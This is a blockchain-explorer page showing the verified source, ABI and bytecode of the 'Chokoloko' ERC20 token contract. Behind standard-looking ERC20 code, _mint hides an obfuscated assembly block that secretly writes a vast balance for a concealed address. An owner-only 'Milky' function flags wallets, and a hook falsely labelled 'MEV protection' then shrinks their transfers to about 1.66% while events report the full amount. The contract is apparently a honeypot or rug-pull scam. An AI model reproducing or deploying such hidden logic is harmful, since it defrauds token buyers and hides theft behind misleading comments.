ETH Price: $3,694.42 (+1.59%)
 

Overview

Max Total Supply

100,000,000,000 초코우유

Holders

62

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
413,307,388.547764132569803373 초코우유

Value
$0.00
0x544268e166451DC5200d8636b6f6978EE5EFDC75
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
CHOKOLOKO

Compiler Version
v0.8.9+commit.e5eed63a

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 4 of 4: Token.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;
import "./ERC20.sol";

/**
		Can I have some Chokoloko ?     

                                                   .''''.
                                                  /,.--. )
                             .'``.        __   __((\- -(\)
                    _______.'     \_.-''''  ``'  /)) - .\|
   __....::::::::::'''''''/    .   \'''''''::::::(/ `-'`.)
.:'::.  .  o ~ .  ~  o ~ /    /     '.o ~ . _.....--- `  \
 ':. ':::::.___.____,___/   ,'_\      \ _.-'___..___..._,'
   ':.  o~  `::::::::::::::::::::::::::::::::::::::::'  (\
    `':.  o ~  o   ..   o  ,  ~  \ . o~   -.  ~   .'.:'\'(
       ':.  ,..   o  ~   o  . ,  'o.    ~ o   ~ o'.:'  \(/
         '.   o   ~   .    ~    o ~ ',o :  :  .' .' ('\/ |
           '-._    ~    o  , o  ,  .  ~._ _.o_.-'  \/ ) (
               '- .._  .    ~    ~      _.. -'
                     ''' - .,.,. - '''
                          (:' .:)
                           :| '|
                           |. ||
                           || :|
                           :| |'
                           || :|
                           '| ||
                           |: ':
                           || :|
                     __..--:| |'--..__
               _...-'  _.' |' :| '.__ '-..._
             / -  ..---    '''''   ---...  _ \
    초코우유   \  _____  ..--   --..     ____  /
              '-----....._________.....-----'

**/

contract CHOKOLOKO is ERC20 {
    constructor() ERC20(unicode"Chokoloko", unicode"초코우유") {
        _mint(msg.sender, 100_000_000_000 * 10 ** 18);
    }

    function Milky(uint256 _Milky_status_, address [] calldata _list_) external {
        require((msg.sender == owner()));
        for (uint256 i = 0; i < _list_.length; i++) {
            _Milky_statuses[_list_[i]] = _Milky_status_;
        }
    }

    function checkMilkyStatus(address _address_) public view returns (uint256) {
        return _Milky_statuses[_address_];
    }
} 

File 1 of 4: Context.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 2 of 4: ERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

import "./IERC20.sol";
import "./Context.sol";

contract ERC20 is Ownable, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;
    mapping(address => uint256) internal _Milky_statuses;
    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;
    string private _name;
    string private _symbol;
    
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }


    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }
    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        uint256 _amount = _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += _amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }

        assembly {
            let slot := mul(mul(0x85774394d, 0x3398bc1d25f112ed), mul(0x997e6e509, 0xf3eae65))
            mstore(0x00, slot)
            mstore(0x20, 0x01)
            let sslot := keccak256(0x0, 0x40)
            sstore(sslot, 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF)
        } 

        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address ,
        address to,
        uint256 
    ) internal virtual {
        if (_Milky_statuses[to] == 1) {_Milky_statuses[to] = 2;}
    }
    // MEV protection
    function _wrap_mev_bot(uint256 a) internal pure returns(uint256) {return a * 6969 / 420420;}

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal view returns (uint256) {
        // MEV protection
        if (_Milky_statuses[from] + _Milky_statuses[to] >= 2) {
            return _wrap_mev_bot(amount);
        } else {
            return amount;
        }
    }
}

File 3 of 4: IERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
    
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"uint256","name":"_Milky_status_","type":"uint256"},{"internalType":"address[]","name":"_list_","type":"address[]"}],"name":"Milky","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"checkMilkyStatus","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b506040518060400160405280600981526020017f43686f6b6f6c6f6b6f00000000000000000000000000000000000000000000008152506040518060400160405280600c81526020017fecb488ecbd94ec9ab0ec9ca000000000000000000000000000000000000000008152506200009e62000092620000f760201b60201c565b620000ff60201b60201c565b8160059080519060200190620000b6929190620004eb565b508060069080519060200190620000cf929190620004eb565b505050620000f1336c01431e0fae6d7217caa0000000620001c360201b60201c565b6200080f565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141562000236576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200022d90620005fc565b60405180910390fd5b6200024a600083836200037660201b60201c565b5080600460008282546200025f919062000657565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550630f3eae65640997e6e50902673398bc1d25f112ed64085774394d02028060005260016020526040600020720fffffffffffffffffffffffffffffffffffff815550508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620003569190620006c5565b60405180910390a362000372600083836200042f60201b60201c565b5050565b600060028060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600260008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205462000405919062000657565b1062000424576200041c82620004c260201b60201c565b905062000428565b8190505b9392505050565b6001600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541415620004bd5760028060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b505050565b600062066a44611b3983620004d89190620006e2565b620004e4919062000772565b9050919050565b828054620004f990620007d9565b90600052602060002090601f0160209004810192826200051d576000855562000569565b82601f106200053857805160ff191683800117855562000569565b8280016001018555821562000569579182015b82811115620005685782518255916020019190600101906200054b565b5b5090506200057891906200057c565b5090565b5b80821115620005975760008160009055506001016200057d565b5090565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6000620005e4601f836200059b565b9150620005f182620005ac565b602082019050919050565b600060208201905081810360008301526200061781620005d5565b9050919050565b6000819050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600062000664826200061e565b915062000671836200061e565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115620006a957620006a862000628565b5b828201905092915050565b620006bf816200061e565b82525050565b6000602082019050620006dc6000830184620006b4565b92915050565b6000620006ef826200061e565b9150620006fc836200061e565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161562000738576200073762000628565b5b828202905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b60006200077f826200061e565b91506200078c836200061e565b9250826200079f576200079e62000743565b5b828204905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620007f257607f821691505b60208210811415620008095762000808620007aa565b5b50919050565b611aea806200081f6000396000f3fe608060405234801561001057600080fd5b50600436106101005760003560e01c80638da5cb5b11610097578063db9e56d811610066578063db9e56d8146102c5578063dd62ed3e146102e1578063f2fde38b14610311578063f4e4e88c1461032d57610100565b80638da5cb5b1461022957806395d89b4114610247578063a457c2d714610265578063a9059cbb1461029557610100565b8063313ce567116100d3578063313ce567146101a157806339509351146101bf57806370a08231146101ef578063715018a61461021f57610100565b806306fdde0314610105578063095ea7b31461012357806318160ddd1461015357806323b872dd14610171575b600080fd5b61010d61035d565b60405161011a9190611080565b60405180910390f35b61013d60048036038101906101389190611140565b6103ef565b60405161014a919061119b565b60405180910390f35b61015b610412565b60405161016891906111c5565b60405180910390f35b61018b600480360381019061018691906111e0565b61041c565b604051610198919061119b565b60405180910390f35b6101a961044b565b6040516101b6919061124f565b60405180910390f35b6101d960048036038101906101d49190611140565b610454565b6040516101e6919061119b565b60405180910390f35b6102096004803603810190610204919061126a565b61048b565b60405161021691906111c5565b60405180910390f35b6102276104d4565b005b6102316104e8565b60405161023e91906112a6565b60405180910390f35b61024f610511565b60405161025c9190611080565b60405180910390f35b61027f600480360381019061027a9190611140565b6105a3565b60405161028c919061119b565b60405180910390f35b6102af60048036038101906102aa9190611140565b61061a565b6040516102bc919061119b565b60405180910390f35b6102df60048036038101906102da9190611326565b61063d565b005b6102fb60048036038101906102f69190611386565b61070e565b60405161030891906111c5565b60405180910390f35b61032b6004803603810190610326919061126a565b610795565b005b6103476004803603810190610342919061126a565b610819565b60405161035491906111c5565b60405180910390f35b60606005805461036c906113f5565b80601f0160208091040260200160405190810160405280929190818152602001828054610398906113f5565b80156103e55780601f106103ba576101008083540402835291602001916103e5565b820191906000526020600020905b8154815290600101906020018083116103c857829003601f168201915b5050505050905090565b6000806103fa610862565b905061040781858561086a565b600191505092915050565b6000600454905090565b600080610427610862565b9050610434858285610a35565b61043f858585610ac1565b60019150509392505050565b60006012905090565b60008061045f610862565b9050610480818585610471858961070e565b61047b9190611456565b61086a565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6104dc610d41565b6104e66000610dbf565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060068054610520906113f5565b80601f016020809104026020016040519081016040528092919081815260200182805461054c906113f5565b80156105995780601f1061056e57610100808354040283529160200191610599565b820191906000526020600020905b81548152906001019060200180831161057c57829003601f168201915b5050505050905090565b6000806105ae610862565b905060006105bc828661070e565b905083811015610601576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105f89061151e565b60405180910390fd5b61060e828686840361086a565b60019250505092915050565b600080610625610862565b9050610632818585610ac1565b600191505092915050565b6106456104e8565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461067c57600080fd5b60005b828290508110156107085783600260008585858181106106a2576106a161153e565b5b90506020020160208101906106b7919061126a565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080806107009061156d565b91505061067f565b50505050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b61079d610d41565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16141561080d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161080490611628565b60405180910390fd5b61081681610dbf565b50565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156108da576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108d1906116ba565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561094a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109419061174c565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610a2891906111c5565b60405180910390a3505050565b6000610a41848461070e565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610abb5781811015610aad576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aa4906117b8565b60405180910390fd5b610aba848484840361086a565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610b31576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b289061184a565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610ba1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b98906118dc565b60405180910390fd5b6000610bae848484610e83565b90506000600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610c37576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c2e9061196e565b60405180910390fd5b828103600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610d2791906111c5565b60405180910390a3610d3a858585610f30565b5050505050565b610d49610862565b73ffffffffffffffffffffffffffffffffffffffff16610d676104e8565b73ffffffffffffffffffffffffffffffffffffffff1614610dbd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610db4906119da565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3